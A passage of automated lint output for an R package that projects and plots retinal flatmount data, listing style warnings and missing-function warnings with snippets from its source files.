here.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return sum_mat The sum of all retina objects in the list, with respect to the rotation indices.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:9:16:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L9) *warning:* **no visible global function definition for ‘mat_from_ret_obj’**\n```r\n​    sum_mat <- mat_from_ret_obj(retina_list[[1]], rotation = 0, ...)\n               ^~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n                                                                                    ^\n```\n[R/matrix_retobj.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' You can decide how much to rotate the retina before returning the matrix. You can also pass arguments to the polar plotter.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param n the number by which to divide the matrix by. Useful when generating partial averages.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param reflect logical, by default it is TRUE, in order to view the retina from outside the eye (rather than from within.)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n                                                                                ^\n```\n[R/matrix_retobj.R:17:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:20:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Lines should not be more than 80 characters.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:20:87:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n                                                                                      ^\n```\n[R/matrix_retobj.R:25:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:27:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Lines should not be more than 80 characters.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:27:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n                                                                                       ^\n```\n[R/matrix_retobj.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:28:26:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                        ~^~\n```\n[R/matrix_retobj.R:28:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                                                                                            ^\n```\n[R/matrix_retobj.R:30:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​    MAT <- map2fit[[2]]$z\n    ^~~\n```\n[R/matrix_retobj.R:32:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​    return(MAT/n)\n             ~^~\n```\n[R/plotting_functions.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Extracts xy and falciform coordinates from datapoints collected from retistruct. Falc and Datapoints are stacked upon one another\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param datapoints_from_retistruct data structure that comes from the datapoints.csv, which is automatically generated by Retistruct.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return L list of pixel xy positions, and falciform coordinates in [1] and [2], respectively\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:9:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​extract_xy_and_falciform <- function(datapoints_from_retistruct, number_of_sampling_sites) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Lines should not be more than 80 characters.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n                                                                                ^\n```\n[R/plotting_functions.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:12:91:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n                                                                                          ^\n```\n[R/plotting_functions.R:16:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L16) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_coordinates <- datapoints_from_retistruct[(xy_len + 1):total_len, ]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:22:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L22) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' ImageJ values don't always show up the right way, because Y values get larger and positive while moving down the image.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:24:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L24) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param falciform_xy_coordinates 2 columns of coordinate (X,Y) data in ImageJ pixel format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable or function name should be snake_case.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:31:52:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    half_of_vertical_pixels <- xy_img_dimensions[2]/2\n                                                  ~^~\n```\n[R/plotting_functions.R:32:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:32:86:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n                                                                                     ^\n```\n[R/plotting_functions.R:38:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint, with fit plot.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:40:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L40) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param pixel_xy_positions 2 columns of coordinate (X,Y) data in ImageJ pixel format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:41:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L41) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param z_vector numerical vector of density values for each of the coordinates\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:42:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy_outline_points 2 columns of coordinate(X,Y) data in ImageJ pixel format for the outline coordinates.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:45:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L45) *style:* **Lines should not be more than 80 characters.**\n```r\n​traditional_flatmount_plot <- function(pixel_xy_positions, z_vector, xy_outline_points) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n           ^~~\n```\n[R/plotting_functions.R:47:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L47) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel(2, 2)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:49:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L49) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel()\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:52:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L52) *warning:* **no visible global function definition for ‘surface’**\n```r\n​    surface(fit)  # Quick image/contour plot of GCV surface.\n    ^~~~~~~\n```\n[R/plotting_functions.R:61:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L61) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint so the user can identify where the tears are.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:64:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L64) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path to the folder that contains the outline.roi file.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:65:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L65) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return roi_coordinates XY vals of pixel coordinates of the outline points, in order.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *style:* **Lines should not be more than 80 characters.**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:19:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *warning:* **no visible global function definition for ‘read.ijroi’**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n                  ^~~~~~~~~~\n```\n[R/plotting_functions.R:70:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:72:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L72) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # format plots has the coordinate (0, 0) in the top left.  We have the coordinate\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:73:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L73) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # (0, 0) in the bottom left. We need to transform P so that the outline appears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:76:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L76) *style:* **Variable or function name should be snake_case.**\n```r\n​    roi_XY_coords <- roi_object$coords\n    ^~~~~~~~~~~~~\n```\n[R/plotting_functions.R:80:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:81:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Lines should not be more than 80 characters.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:81:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n                                                                                ^\n```\n[R/plotting_functions.R:83:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:83:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n                                                                                  ^\n```\n[R/plotting_functions.R:85:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L85) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(\"If you are getting this message, you are using a special feature. Contact me at brian.cohn@usc.edu and I will happily teach you how to use it.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:93:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L93) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Creates a markup.csv file. One of the dorsal_outline_index or nasal_outline_index must be filled in. Not both.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:96:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L96) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param dorsal_outline_index The index of the point that points toward dorsal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:97:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L97) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param nasal_outline_index The index of the opint that points toward nasal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:98:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L98) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the markup.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:107:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n                                                                                                          ^\n```\n[R/plotting_functions.R:103:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L103) *style:* **Lines should not be more than 80 characters.**\n```r\n​        ## https://stackoverflow.com/questions/18509527/first-letter-to-upper-case\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                        ^\n```\n[R/plotting_functions.R:109:62:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, 